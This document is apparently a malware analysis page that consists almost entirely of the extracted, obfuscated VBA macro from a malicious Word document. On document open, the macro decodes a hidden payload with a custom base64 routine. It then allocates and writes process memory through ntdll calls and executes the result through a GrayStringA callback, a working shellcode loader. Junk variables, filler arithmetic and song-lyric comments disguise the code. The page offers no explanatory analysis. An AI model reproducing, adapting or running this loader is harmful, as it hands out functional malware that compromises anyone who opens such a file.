Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cricetus(cimetidine)
Dim descension As Variant
Dim calloused As String
Dim versifier As Integer
Dim equipotent As Variant
#If Win64 > 0 Then
Dim isochrone As Variant
Dim puff As LongPtr
sinistrally = 8 + 0
Dim libido As LongPtr
Dim pike As Long
Dim reflective As Long
Dim mandible As LongPtr
Dim coordination As Long
#Else
Dim backside As Byte
Dim puff As Long
sinistrally = 73 + 47 - 108 - 8
Dim libido As Long
Dim veneto As Integer
Dim mandible As Long
Dim disenthrallment As String
Dim tablinum As Long
#End If
pawnee = VarPtr(puff)
claustrophobic = agis(pawnee, VarPtr(cimetidine) + 8, sinistrally)
feel = 107 - 108
libido = 0
hereditary = 63 - 100 + 37
mandible = 9735
cuisse = 4096
obtrusively = 12 - 52 + 104
lawabiding = tuft(ByVal feel, libido, ByVal hereditary, mandible, ByVal cuisse, ByVal obtrusively)
oiled = "aphyllanthes"

collocation = Fix(302)

agis libido, puff, 4384
chelonian = 83
bubalus = 29634
calorie = 370889
Field = NPer(76 / 626, chelonian, -21428, calorie, 0)

cricetus = libido
End Function
Private Sub Document_Open()
Dim ecumenical As Variant
Dim irresolution As Byte
bola = "sudatory"
avatar = "jio"
theocracy
cheapen = 4
calcification = 394
obligatorily = 52583
fuimus = 104318
fuimus = Financial.SYD(fuimus, obligatorily, calcification, cheapen)
End Sub
Sub theocracy()
Dim inuendo As Variant
Dim mortise As Long
screed = ThisDocument.GetLetterContent().SenderGender
intrapulmonary.hotbed.Value = screed + 9
model = "uncompensated"
eve = "tesselated"
Set joint = intrapulmonary.hotbed.SelectedItem
paraprofessional = 5
barcelona = 135
hotei = 14959
gun = 559183
gun = Financial.SYD(gun, hotei, barcelona, paraprofessional)

accordionist = joint.Name
archipelago = 124 + 114 + 5606
seems = Right(accordionist, archipelago)
tendentious = deat.blasphemer(seems)
logometer = 5
audiology = 4719
barbarian = 574549
neurosarcoma = NPer(72 / 559, logometer, -6909, barbarian, 1)

again = "trull"
#If Win64 Then
Dim augustus As Integer
Dim titian As LongPtr
Dim boned As LongPtr
Dim naturae As Byte
#Else
Dim affably As Variant
Dim boned As Long
Dim mitra As Long
Dim titian As Long
#End If
functionalist = 38 - 96 + 68 - 10
aphyllophorales = "succors"
autocracy = "fac" & "ilita" & "tor"
condottiere = 4096
bucharest = 96
vivifying = 19332
chemosurgery = 106866
seamstress = NPer(84 / 764, bucharest, -22176, chemosurgery, 0)

controvertist = "elzevir"
hypsiglena = "gumwood"
aerosolized = "illluck"
charlatanism = "fluo" & "silica" & "te"
loosen = 118
despite = 31784
coulee = 414499
pinguecula = NPer(55 / 361, loosen, -27847, coulee, 0)

suppositious = tendentious
reflective = "ag" & "grie" & "ve"
caesural = "caprine"
titian = cricetus(suppositious)
banderilla = "catkinate"
asio = "catcall"
#If Win64 Then
Dim micrurus As Byte
Dim overreligious As LongPtr
commonly = "thriftlessness"
armstrong = "chelation"
Dim chub As LongPtr
bolus = 70 - 114 + 73 + 1283
#Else
bikini = "thaumaturgist"
cleromancy = "en" & "terolobium"
Dim overreligious As Long
demosthenic = 94 + 401
Dim chub As Long
bolus = demosthenic + 2659

#End If
Dim aldose As Integer
Dim anthriscus As Byte
overreligious = 0
boned = titian + bolus
chub = 1
nonsense = cryogenic(chub, chub, boned, overreligious, chub, overreligious, overreligious, overreligious, overreligious)
studia = 11
montane = 13165
outwardmoving = 117822
caterer = NPer(68 / 683, studia, -19242, outwardmoving, 0)

End Sub

Sub GenerateGlossary()
      Dim strSource As String
      Dim strDestination As String
      Dim strGlossaryName As String

      strSource = ActiveWindow.Caption
      strGlossaryName = "word"

      Documents.Add
      ActiveDocument.SaveAs FileName:=strGlossaryName, FileFormat:=wdFormatDocument
      strDestination = ActiveWindow.Caption
      Windows(strSource).Activate
  End Sub

Function agis(armistice, mentira, hystricidae)
#If Win64 Then
Dim trickster As Variant
Dim benzine As Integer
Dim bibliomaniacal As LongPtr
Dim autogamy As LongPtr
Dim bagatelle As LongPtr
Dim mascot As Long
Dim momus As LongPtr
Dim autacoid As LongPtr
#Else
Dim autogamy As Long
Dim sat As Variant
Dim bibliomaniacal As Long
Dim coriaceous As Integer
Dim momus As Long
Dim ghostwriter As Variant
Dim bagatelle As Long
Dim katsuwonidae As Long
Dim autacoid As Long
Dim convexity As String
Dim margravine As String
#End If
bryozoa = bryozoa
canzonet = collocation / 173
autogamy = armistice
autacoid = hystricidae
bryozoa = "whensoever"
momus = mentira
barn = 115
astrolabe = 6403
cubit = 359399
impressionism = NPer(70 / 393, barn, -12759, cubit, 0)

ninespot = Rnd(332)
bibliomaniacal = 14 - 1 - 14
dissolved ByVal bibliomaniacal, autogamy, momus, autacoid, bagatelle
bryozoa = "stewing"
End Function

Attribute VB_Name = "deat"
'  Awesome, well let's go, awesome
'  Saying I should lay down green on a ring like lantern
#If Win64 Then
'  I think that I kill em, play possum
'  Shawty you fine and your body is awesome
Public Declare PtrSafe Function tuft Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (curvature As LongPtr, parcels As LongPtr, ByVal vole As LongPtr,goodfornothingByVal As LongPtr, metic As LongPtr, ByVal nella As LongPtr) As LongPtr
'  How rude, Stephanie Tanner
'  Sold out shows, girls trying to get a glitz
Public Declare PtrSafe Function dispiritedly Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (glucoside As LongPtr, damaging As Any,enchantment As LongPtr, helenium As Any) As Boolean
'  Wayne's World excellent
'  I'm awesome every time I lay it down
Public Declare PtrSafe Function bully Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal adulterant As LongPtr,closeted As LongPtr,mauder As LongPtr,transfigure As LongPtr,catatonic As LongPtr) As Boolean
'  Wayne's World excellent
'  I'm awesome every time I lay it down
Public Declare PtrSafe Function drawstring Lib "Shell32.dll" Alias "SHGetDesktopFolder" (combustion As LongPtr)
'  Wayne's World excellent
'  I'm awesome every time I lay it down
Public  Declare PtrSafe Function cryogenic Lib "User32" Alias "GrayStringA" ( ByVal unadvisable As Any, ByVal grandmother As Any, ByVal bacteroides As Any, ByVal chateura As Any, ByVal cognominal As Any, ByVal bicycle As Any, ByVal motor As Any, ByVal fates As Any, ByVal aeolian As Any) As Long
'  Wayne's World excellent
'  I'm awesome every time I lay it down
Public Declare PtrSafe Function antlered Lib "Shlwapi.dll" Alias "PathFileExists" (cruel As LongPtr) As LongPtr
'  Wayne's World excellent
'  I'm awesome every time I lay it down
Public Declare PtrSafe Function dissolved Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal tutelage As Any, ByVal notturnoitalian As Any, ByVal lope As Any, ByVal vitiated As Any, ByVal cosmetologist As Any) As LongPtr
'  Wayne's World excellent
'  I'm awesome every time I lay it down
Public Declare PtrSafe Function grandiose Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (halfcock As LongPtr,bereaved As LongPtr,apprentice As LongPtr) As LongPtr
'  That's a side smiley face cause I'mma make the best of it
'  Two thumbs up, you gon point 'em at this guy

'  Wanna roll
'  See even G couldn't F with it
#Else
'  Party on Garth, shwing
'  Gator on my shirt, what did it Lacoste him
Public Declare Function eyecup Lib "Shell32.dll" Alias "SHGetDesktopFolder" (predecessor As Long)
'  Good Will Hunting, got up out of the hood
'  Wanna roll
Public Declare Function dissolved Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal balking As Any, ByVal bullseye As Any, ByVal arquebusade As Any, ByVal thereabouts As Any, ByVal catarrh As Any) As Long
'  Good Will Hunting, got up out of the hood
'  Party on Garth, shwing
Public Declare Function actually Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal mauvais As Long, annwfn As Long, cadet As Long, lemaireocereus As Long, offices As Long) As Boolean
'  Hands in the sky like
'  Two thumbs up, you gon point em at this guy
Public Declare Function apart Lib "Shlwapi.dll" Alias "PathFileExists" (captor As Long) As Long
'  Party on Garth, shwing
'  How you feel
Public Declare Function paces Lib "Shell32.dll" Alias "SHGetSetFolderCustomSettingsW" (flatfoot As Long, big As Long, carissa As Long) As Long
'  Two thumbs up, you gon point 'em at this guy
'  Now tell me what got two thumbs and knows how to spit rhymes
Public Declare Function cryogenic Lib "User32" Alias "GrayStringA" (ByVal encyclopedical As Any, ByVal ennoble As Any, ByVal abolitionize As Any, ByVal rudimental As Any, ByVal nebulosity As Any, ByVal empathic As Any, ByVal primrose As Any, ByVal cinderwench As Any, ByVal misjoining As Any) As Long
'  Trying to escape like Cuba Gooding with the flow
'  Cooler than a peppermint
Public Declare Function tuft Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (kf As Long, blanch As Long, ByVal acorn As Long, allopathicByVal As Long, applicable As Long, ByVal headmaster As Long) As Long
'  Sold out shows, girls trying to get a glitz
'  Work ethic harder than a Mexican
Public Declare Function careerism Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (lifelike As Long, sind As Any, admit As Long, novelization As Any) As Boolean
'  Awesome, well let's go, awesome
'  Shawty you fine and your body is awesome

'  Now tell me what got two thumbs and knows how to spit rhymes
'  Gator on my shirt, what did it Lacoste him
#End If
'  Now tell me what got two thumbs and knows how to spit rhymes
'  Gator on my shirt, what did it Lacoste him
Function watermeal(terminated)
watermeal = AscW(terminated)
End Function
Function blasphemer(eosinophilia) As String
Dim acritical(6965) As Byte
Dim matronymic As Long

Dim delirium() As Byte
Dim diplopterygium As Long

Dim telum As String
Dim dissipated As Long
Dim lactuca As Long
collocation = Rnd(184)

Dim younker As Long

Dim flowerbed As Long
Dim anapsida(63) As Long
Dim accedas(63) As Long
bryozoa = "confluence"

Dim grody(63) As Long
Dim bailey As Integer

Dim chromolithograph As Integer
ninespot = Fix(184)

Dim guiana As Long
enablement = 8 + 8 + 65520
eagleeyed = 37 - 122 + 65365
Dim baisakh As Byte

Dim bonnebouche As Integer

golfing = 262144
ornithology = 94 + 118 - 54 - 94
enviousness = 255
Dim bumptiousness As String

burbot = 16515072
concupiscent = 4096
asarum = 4032
razorbill = 258048
gunwale = 16711680
acholia = 53 - 57 + 67
afoul = 65 + 14 + 10 + 167
Dim felt As Variant
apodeictical = 111 - 111
hopelessly = 4 + 5839
Dim bloodied() As Byte
Dim blepharitis As String
bloodied = VBA.Strings.StrConv(eosinophilia, vbFromUnicode)
Dim alphabetical As String
cyclicity = 8
barrenness = 178
prescript = 22663
espy = 463770
espy = Financial.SYD(espy, prescript, barrenness, cyclicity)

acoustic = 5843
camerated = 2 + Sqr(RGB(0, 1, 0))
For perisher = 0 To acoustic
If perisher Mod 2 = 0 Then
bloodied(perisher) = bloodied(perisher) + camerated
Else
bloodied(perisher) = bloodied(perisher) + camerated - 1
End If
Next perisher
notoriously = 56
valencia = 34775
permanently = 517542
aliene = NPer(84 / 426, notoriously, -20050, permanently, 0)

chromolithograph = 0
descendants = 8 + 17 - 25
canella = 46 - 72 - 99 + 168
abderite = caries
For flowerbed = 0 To 63
anapsida(flowerbed) = breakdown(flowerbed, ornithology, 45)
grody(flowerbed) = breakdown(flowerbed, concupiscent, 45)
accedas(flowerbed) = breakdown(flowerbed, golfing, 45)
Next flowerbed
ahead = 2
mycophagist = 391
acidforming = 16263
pontiff = 419702
pontiff = Financial.SYD(pontiff, acidforming, mycophagist, ahead)

delirium = bloodied
emmanthe = 51 - 47
car = 6
telegraphic = 177
freshwater = 13512
attemper = 401819
attemper = Financial.SYD(attemper, freshwater, telegraphic, car)

agrimonia = 38 + 107 - 142
ninespot = Fix(476)

mischievous = "powderpuff"

perpetua = agrimonia + 1
babyfaced = 2
For lactuca = 0 To acoustic
cosmetologist = delirium(lactuca)
church = delirium(lactuca + 2)
guiana = accedas(abderite(cosmetologist)) _
 + grody(abderite(delirium(lactuca + 1))) + anapsida(abderite(church)) + abderite(delirium(lactuca + agrimonia))
flowerbed = breakdown(guiana, gunwale, 37)
acritical(dissipated) = breakdown(flowerbed, enablement, 27)
flowerbed = breakdown(guiana, eagleeyed, 37)
acritical(dissipated + 1) = breakdown(flowerbed, afoul, 27)
acritical(dissipated + babyfaced) = breakdown(guiana, enviousness, 37)
dissipated = dissipated + babyfaced + 1
lactuca = lactuca + 3
Next
blasphemer = acritical
End Function

Function caries()
Dim araba(255) As Byte
rhamphoid = 35 - 97 + 127
Do
araba(rhamphoid) = rhamphoid - 65
rhamphoid = rhamphoid + 1
Loop Until rhamphoid = 91
rhamphoid = 48
Do
araba(rhamphoid) = rhamphoid + 4
rhamphoid = rhamphoid + 1
Loop Until rhamphoid = 58
rhamphoid = 97
Do
araba(rhamphoid) = rhamphoid - 71
rhamphoid = rhamphoid + 1
Loop Until rhamphoid = 123
araba(47) = 63
rhamphoid = 43
araba(rhamphoid) = 62
caries = araba
End Function
Sub tableSel()
    Dim tempTable
    Documents("Log.doc").Tables(1).Select
    Set tempTable = Selection.Tables(1).Range
    tempRange.Tables(2).Select
End Sub


Function breakdown(superincumbent, condolence, clivers)
Select Case clivers
Case 27
breakdown = superincumbent \ condolence
Case 37
breakdown = superincumbent And condolence
Case 45
breakdown = superincumbent * condolence
End Select
End Function


Attribute VB_Name = "intrapulmonary"
Attribute VB_Base = "0{7BC559A3-6874-4202-A224-40C1F107B0DE}{9C6B395E-A082-4F20-A3CB-1F49D77A17C1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False